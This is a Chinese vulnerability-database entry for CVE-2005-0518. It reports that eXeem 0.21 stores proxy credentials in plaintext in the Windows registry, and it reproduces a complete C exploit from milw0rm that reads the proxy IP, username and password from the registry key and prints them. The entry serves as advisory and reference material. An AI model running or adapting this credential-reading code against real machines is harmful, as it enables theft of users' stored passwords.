eXeem Exeem注册表 键敏感信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108475 漏洞类型 未知
发布时间 2005-02-22 更新时间 2005-02-23
CVE编号 CVE-2005-0518 CNNVD-ID CNNVD-200502-089
漏洞平台 Windows CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/834
https://www.securityfocus.com/bid/90217
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200502-089
|漏洞详情
eXeem是新一代PeerToPeer(P2P)软件。eXeem0.21将密码之类的敏感信息以纯文本格式存储在Exeem注册表键中,这可让本地用户通过获取proxy_user和proxy_password值获取特权。
|漏洞EXP
/*****************************************************************

eXeem v0.21 Local Exploit by Kozan

Application: eXeem v0.21
Vendor: www.exeem.com
Vulnerable Description: eXeem v0.21 discloses passwords
for proxy settings to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com

*****************************************************************/

#include <stdio.h>
#include <windows.h>

#define BUFSIZE 100
HKEY hKey;
char proxy_ip[BUFSIZE],
        proxy_username[BUFSIZE],
        proxy_password[BUFSIZE];

DWORD dwBufLen=BUFSIZE;
LONG lRet;

int main()
{

       if(RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Exeem",
                                       0,
                                       KEY_QUERY_VALUE,
                                       &hKey) == ERROR_SUCCESS)
   {

               lRet = RegQueryValueEx( hKey, "proxy_ip", NULL, NULL,
                                                      (LPBYTE) proxy_ip, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("An error occured!\n");
                                return 0;
                       }

               lRet = RegQueryValueEx( hKey, "proxy_username", NULL, NULL,
                                                      (LPBYTE) proxy_username, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("An error occured!\n");
                                return 0;
                       }

               lRet = RegQueryValueEx( hKey, "proxy_password", NULL, NULL,
                                                      (LPBYTE) proxy_password, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("An error occured!\n");
                                return 0;
                       }

               RegCloseKey(hKey);

               printf("eXeem v0.21 Local Exploit by Kozan\n");
               printf("Credits to ATmaCA\n");
               printf("www.netmagister.com  -  www.spyinstructors.com \n\n");
               printf("Proxy IP           : %s\n",proxy_ip);
               printf("Proxy Username     : %s\n",proxy_username);
               printf("Proxy Password     : %s\n",proxy_password);

   }
       else
       {
       printf("eXeem v0.21 is not installed on your pc!\n");
   }

       return 0;
}

// milw0rm.com [2005-02-22]
|受影响的产品
Exeem Exeem 0.21
|参考资料

来源:SECTRACK
名称:1013266
链接:http://securitytracker.com/id?1013266